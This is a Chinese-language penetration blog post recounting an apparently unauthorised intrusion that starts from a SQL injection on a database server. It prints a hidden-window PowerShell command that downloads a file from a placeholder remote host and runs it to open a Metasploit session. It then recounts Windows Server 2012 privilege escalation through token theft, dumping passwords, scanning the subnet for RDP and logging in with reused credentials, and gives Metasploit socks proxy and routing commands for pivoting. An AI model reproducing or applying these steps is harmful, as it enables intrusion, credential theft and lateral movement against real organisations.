• powershell 远程下载文件+MSF监听
  • 提权之EXP砸不动肿么办?
  • 内网转发的困扰
  • 峰回路转,幸福来的太突然
  • 补充:
  • 首页
  • 渗透
  • 折腾
  • 转载
  • 关于Me
  • 榜上有名
  • 文章存档
  • 友情链接

不妨看看这里

会员面板

Base64 Image

一次从注入到win2012提权的故事

  • Mr.Wu
  • 2018-07-23
  • 0
偶遇一个注入,权限还是蛮大的,至少执行cmdshell是没问题的,因为这是一台数据库服务器,和目标站是站库分离,又在内网中,所以没办法拿下shell。 我想得到内网环境,继续内网渗透,可是在用sqlmap上传的过程中发现始终无法上传....

powershell 远程下载文件+MSF监听

没错,就是通过powershell 远程下载文件,没法上传,我们就下载,命令很简单:

powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://xxx.xx.com/1.txt','C:\Windows\Tasks\23.txt');start-process 
1.寻找可读可写目录 2.MSF设置好监听 3.确认文件远程下载成功,然后执行 4.MSF成功上线

提权之EXP砸不动肿么办?

本来吧,我一直以为是win2008的。。原谅我没仔细看。。。 在搞定上传问题之后,就准备转发内网出来上服务器了,但是呢,首先咱得有个账号不是?那么就需要提权了。。。 经过半天的powershell 远程下载EXP,一堆EXP砸上去发现毫无反应,what? 然后果断systeminfo看下补丁。。。结果震惊的发现居然是win2012的系统?。。。。 去土司搜了下win2012提权,找到一篇文章:WinServer2012提权:实验RottenPotato(烂土豆)+Metasploit 正巧meterpreter我已经建立了,这是缺啥来啥啊,一点都不拐弯抹角。。。。根据文中给出的方法一步步做,这里不多说,直接看图: use incognito过后,我直接就列出来NT AUTHORITY\SYSTEM的令牌了,因此省去了后面的一些步骤。 感谢@了凡四训 大牛的文章,让我第一次发现win2012提权居然可以如此简单? 接下来就是getpass,然后转发3389,上服务器了。

内网转发的困扰

服务器上没有站点,所以reGeorg-master的转发脚本全部用不了,我本机是内网,目标也是内网。。NC也不行。。。该怎么办呢?。。。 很多端口转发工具我都没用过,因为很少搞内网。。。 强调一下,我MSF是在外网的centos上面,所以MSF可以反弹成功,另外通过msf代理的下来的话毫无作用,我是想代理到我本机,我的电脑内网,目标内网,是这么个情况。 需要exe格式,还需要支持双内网,真心想不到什么工具了。 瞬间陷入死胡同,容我静静。

峰回路转,幸福来的太突然

就在我不知道该怎么办好的时候,突然脑子灵光一闪,瞬间思路来了。 1.首先,他是有外网IP的 2.之前通过meterpreter的system权限shell,getpass了密码 3.思路就是,扫C段中的3389端口,尝试登陆 然后。。我就神奇的进来了。。。。 接下来,就简单了,数据库密码通杀,3389密码通杀,有了跳板,内网真的不在是内网了。 最后,补充一点,注入点那个服务器,哪怕他有外网IP,但是没放行,所有端口全在内网,所以也不可能直接3389链接登录了。 至此本次渗透结束。

补充:

感谢土司各位大佬的帮助,没怎么研究过MSF,对MSF不熟悉,原来还可以利用MSF开代理,然后本机链接代理的操作。
msf开了代理 用Proxifier 这个软件填你vpsip+代理端口 添加你要代理的程序 比如mstsc..firefox 你代理的本地程序就走代理流量了。

msf > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > set SRVPORT 443 
SRVPORT => 443
msf auxiliary(socks4a) > exploit 
route add 192.168.0.0 255.255.0.0 sesseion id 
(这里路由根据内网情况自己设置吧也可以直接设置0.0.0.0 .......)
© 2025 MrWu
Theme by Wing-child
  • {{ item.name }}
  • {{ item.name }}